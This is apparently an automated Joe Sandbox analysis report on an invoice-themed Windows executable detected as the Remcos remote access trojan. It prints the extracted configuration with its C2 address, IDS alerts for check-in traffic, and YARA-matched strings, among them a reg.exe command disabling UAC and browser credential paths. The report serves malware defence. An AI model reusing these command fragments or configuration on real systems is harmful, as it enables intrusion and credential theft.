Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
z49FACTURA-0987678.exe

Overview

General Information

Sample name:z49FACTURA-0987678.exe
Analysis ID:1567452
MD5:876f47f33c5975497c15bf24d50952b5
SHA1:a47579ea0e5d47ceb89cbb3450f4c482768a0bf8
SHA256:49e8a1f12fb5202470604efe01c0d60949d20d302a76aed85b2a049e91266366
Tags:exeuser-Porcupine
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Drops VBS files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • z49FACTURA-0987678.exe (PID: 7664 cmdline: "C:\Users\user\Desktop\z49FACTURA-0987678.exe" MD5: 876F47F33C5975497C15BF24D50952B5)
    • turbinals.exe (PID: 7720 cmdline: "C:\Users\user\Desktop\z49FACTURA-0987678.exe" MD5: 876F47F33C5975497C15BF24D50952B5)
      • turbinals.exe (PID: 7744 cmdline: "C:\Users\user\AppData\Local\acceptancy\turbinals.exe" MD5: 876F47F33C5975497C15BF24D50952B5)
        • turbinals.exe (PID: 7940 cmdline: C:\Users\user\AppData\Local\acceptancy\turbinals.exe /stext "C:\Users\user\AppData\Local\Temp\ntpiwvxpqbhwumsvyl" MD5: 876F47F33C5975497C15BF24D50952B5)
        • turbinals.exe (PID: 7960 cmdline: C:\Users\user\AppData\Local\acceptancy\turbinals.exe /stext "C:\Users\user\AppData\Local\Temp\pvdaxohiejzjxsohpwwof" MD5: 876F47F33C5975497C15BF24D50952B5)
        • turbinals.exe (PID: 7976 cmdline: C:\Users\user\AppData\Local\acceptancy\turbinals.exe /stext "C:\Users\user\AppData\Local\Temp\apitxysksrrohzclyhjpqrrk" MD5: 876F47F33C5975497C15BF24D50952B5)
  • wscript.exe (PID: 8056 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\turbinals.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • turbinals.exe (PID: 8108 cmdline: "C:\Users\user\AppData\Local\acceptancy\turbinals.exe" MD5: 876F47F33C5975497C15BF24D50952B5)
      • turbinals.exe (PID: 8124 cmdline: "C:\Users\user\AppData\Local\acceptancy\turbinals.exe" MD5: 876F47F33C5975497C15BF24D50952B5)
        • turbinals.exe (PID: 8144 cmdline: "C:\Users\user\AppData\Local\acceptancy\turbinals.exe" MD5: 876F47F33C5975497C15BF24D50952B5)
          • turbinals.exe (PID: 4984 cmdline: "C:\Users\user\AppData\Local\acceptancy\turbinals.exe" MD5: 876F47F33C5975497C15BF24D50952B5)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["192.210.150.26:8787:0"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-R1T905", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000003.00000002.3760192225.000000000169F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000003.00000002.3758537352.00000000014B8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000000A.00000002.1447676377.0000000000EC0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          0000000A.00000002.1447676377.0000000000EC0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            0000000A.00000002.1447676377.0000000000EC0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              Click to see the 75 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              13.2.turbinals.exe.400000.0.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                13.2.turbinals.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                  13.2.turbinals.exe.400000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    13.2.turbinals.exe.400000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                    • 0x6b6f8:$a1: Remcos restarted by watchdog!
                    • 0x6bc70:$a3: %02i:%02i:%02i:%03i
                    13.2.turbinals.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
                    • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
                    • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                    • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                    • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                    • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                    • 0x65a04:$str_b2: Executing file:
                    • 0x6683c:$str_b3: GetDirectListeningPort
                    • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                    • 0x66380:$str_b7: \update.vbs
                    • 0x65a2c:$str_b9: Downloaded file:
                    • 0x65a18:$str_b10: Downloading file:
                    • 0x65abc:$str_b12: Failed to upload file:
                    • 0x66804:$str_b13: StartForward
                    • 0x66824:$str_b14: StopForward
                    • 0x662d8:$str_b15: fso.DeleteFile "
                    • 0x6626c:$str_b16: On Error Resume Next
                    • 0x66308:$str_b17: fso.DeleteFolder "
                    • 0x65aac:$str_b18: Uploaded file:
                    • 0x65a6c:$str_b19: Unable to delete:
                    • 0x662a0:$str_b20: while fso.FileExists("
                    • 0x65f49:$str_c0: [Firefox StoredLogins not found]
                    Click to see the 91 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: WScript or CScript Dropper
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\turbinals.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\turbinals.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\turbinals.vbs" , ProcessId: 8056, ProcessName: wscript.exe
                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\turbinals.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\turbinals.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\turbinals.vbs" , ProcessId: 8056, ProcessName: wscript.exe

                    Data Obfuscation

                    barindex
                    Sigma detected: Drops script at startup location
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, ProcessId: 7720, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\turbinals.vbs

                    Stealing of Sensitive Information

                    barindex
                    Sigma detected: Remcos
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, ProcessId: 7744, TargetFilename: C:\ProgramData\remcos\logs.dat

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-03T15:40:12.448808+010020327761Malware Command and Control Activity Detected192.168.2.1049703192.210.150.268787TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-03T15:40:13.609424+010020327771Malware Command and Control Activity Detected192.210.150.268787192.168.2.1049703TCP
                    2024-12-03T15:42:38.466482+010020327771Malware Command and Control Activity Detected192.210.150.268787192.168.2.1049703TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-03T15:40:16.569413+010028033043Unknown Traffic192.168.2.1049710178.237.33.5080TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 00000003.00000002.3760107455.00000000015CD000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["192.210.150.26:8787:0"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-R1T905", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeReversingLabs: Detection: 26%
                    Multi AV Scanner detection for submitted file
                    Source: z49FACTURA-0987678.exeReversingLabs: Detection: 26%
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 13.2.turbinals.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.turbinals.exe.ec0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.turbinals.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.turbinals.exe.3bb0000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.turbinals.exe.3bb0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.turbinals.exe.3180000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.turbinals.exe.3490000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.turbinals.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.turbinals.exe.1d00000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.turbinals.exe.1d00000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.turbinals.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.turbinals.exe.3180000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.turbinals.exe.35d0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.turbinals.exe.ec0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.turbinals.exe.3490000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.turbinals.exe.35d0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.3760192225.000000000169F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3758537352.00000000014B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.1447676377.0000000000EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3758634982.00000000014F3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1464360222.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3755615958.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1465367687.0000000003180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3760107455.00000000015CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1437439643.0000000001D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3761526456.000000000402F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3761470850.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1313746191.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1465257785.00000000013E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.1457935230.00000000035D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: turbinals.exe PID: 7720, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: turbinals.exe PID: 7744, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: turbinals.exe PID: 8108, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: turbinals.exe PID: 8124, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: turbinals.exe PID: 8144, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: turbinals.exe PID: 4984, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: z49FACTURA-0987678.exeJoe Sandbox ML: detected
                    Source: turbinals.exe, 00000002.00000002.1313746191.0000000003490000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_46449225-c

                    Exploits

                    barindex
                    Yara detected UAC Bypass using CMSTP
                    Source: Yara matchFile source: 13.2.turbinals.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.turbinals.exe.ec0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.turbinals.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.turbinals.exe.3bb0000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.turbinals.exe.3bb0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.turbinals.exe.3180000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.turbinals.exe.3490000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.turbinals.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.turbinals.exe.1d00000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.turbinals.exe.1d00000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.turbinals.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.turbinals.exe.3180000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.turbinals.exe.35d0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.turbinals.exe.ec0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.turbinals.exe.3490000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.turbinals.exe.35d0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000A.00000002.1447676377.0000000000EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1464360222.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3755615958.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.1465367687.0000000003180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1437439643.0000000001D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3761470850.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1313746191.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.1457935230.00000000035D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: turbinals.exe PID: 7720, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: turbinals.exe PID: 7744, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: turbinals.exe PID: 8108, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: turbinals.exe PID: 8124, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: turbinals.exe PID: 8144, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: turbinals.exe PID: 4984, type: MEMORYSTR
                    Source: z49FACTURA-0987678.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F3445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_00F3445A
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F3C6D1 FindFirstFileW,FindClose,0_2_00F3C6D1
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F3C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00F3C75C
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F3EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00F3EF95
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F3F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00F3F0F2
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F3F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00F3F3F3
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F337EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00F337EF
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F33B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00F33B12
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F3BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00F3BCBC
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D4445A GetFileAttributesW,FindFirstFileW,FindClose,2_2_00D4445A
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D4C6D1 FindFirstFileW,FindClose,2_2_00D4C6D1
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D4C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_00D4C75C
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D4EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00D4EF95
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D4F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00D4F0F2
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D4F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00D4F3F3
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D437EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00D437EF
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D43B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00D43B12
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D4BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00D4BCBC

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.10:49703 -> 192.210.150.26:8787
                    Source: Network trafficSuricata IDS: 2032777 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Server Response : 192.210.150.26:8787 -> 192.168.2.10:49703
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorIPs: 192.210.150.26
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                    Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.10:49710 -> 178.237.33.50:80
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F422EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00F422EE
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: turbinals.exe, 00000003.00000002.3761803858.00000000050E0000.00000040.10000000.00040000.00000000.sdmp, turbinals.exe, 00000007.00000002.1371186223.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                    Source: turbinals.exe, 00000005.00000003.1381036053.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: file://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
